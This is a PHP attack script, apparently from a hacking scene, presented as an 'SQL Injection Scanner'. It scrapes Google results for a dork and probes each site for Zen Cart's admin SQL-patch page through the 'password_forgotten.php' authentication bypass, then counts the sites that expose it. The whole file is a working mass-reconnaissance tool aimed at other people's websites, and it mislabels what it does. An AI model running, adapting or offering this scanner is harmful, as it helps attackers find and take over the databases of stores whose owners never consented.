<?php
/**
* SQL Injection Scanner
* PHP Version By XShimeX
* Version 1.0
* Thanks To: TBDSecurity.Com, <b style="color:black;background-color:#ffff66">HMSecurity</b>.org, All my friends, And ALLAH.
*/
set_time_limit(0);
$vuln = 0;
$not_vuln = 0;
$total = 0;
print "[+] SQL Injection Scanner PHP Version\n";
print "[+] Version 1.0 By XShimeX\n";
if(!$argv[1]) {
print "[%] Usage: $argv[0] <dork>\n";
print "[%] Example : $argv[0] inurl:news.php?id=\n";
exit;
}
/**
* SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
*/
$bug = array(
'If you are installing 3rd-party contributions, note that you do so at your own risk',
'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE',
'Zen Cartâ„¢ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database',
'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page',
'Please upload the new zc_install folder and run the upgrade from there instead for better reliability'
);
print "[@] Start Finding Links...\n";
for($i = 0; $i <= 900; $i += 10) {
$fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N");
@preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $fp, $links);
$url[] = $links[2];
}
print "[@] Done Finding Links...\n";
print "[@] Now searching for Vulnerable\n";
foreach($url as $key) {
foreach($key as $value) {
$fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute");
foreach($bug as $error) {
if(@preg_match("/$error/", $fp)) {
print "[#] zen cart error: $value'\n";
$vuln++;
} else {
$not_vuln++;
}
$total++;
}
}
}
print "[@] Done Scanning\n";
print "[%] Result\n";
print "[-] Total Vulnerable: $vuln\n";
print "[-] Total Not Vulnerable : $not_vuln\n";
print "[-] Total scanned Website: $total\n";
print "Enjoy :)\n";
?>
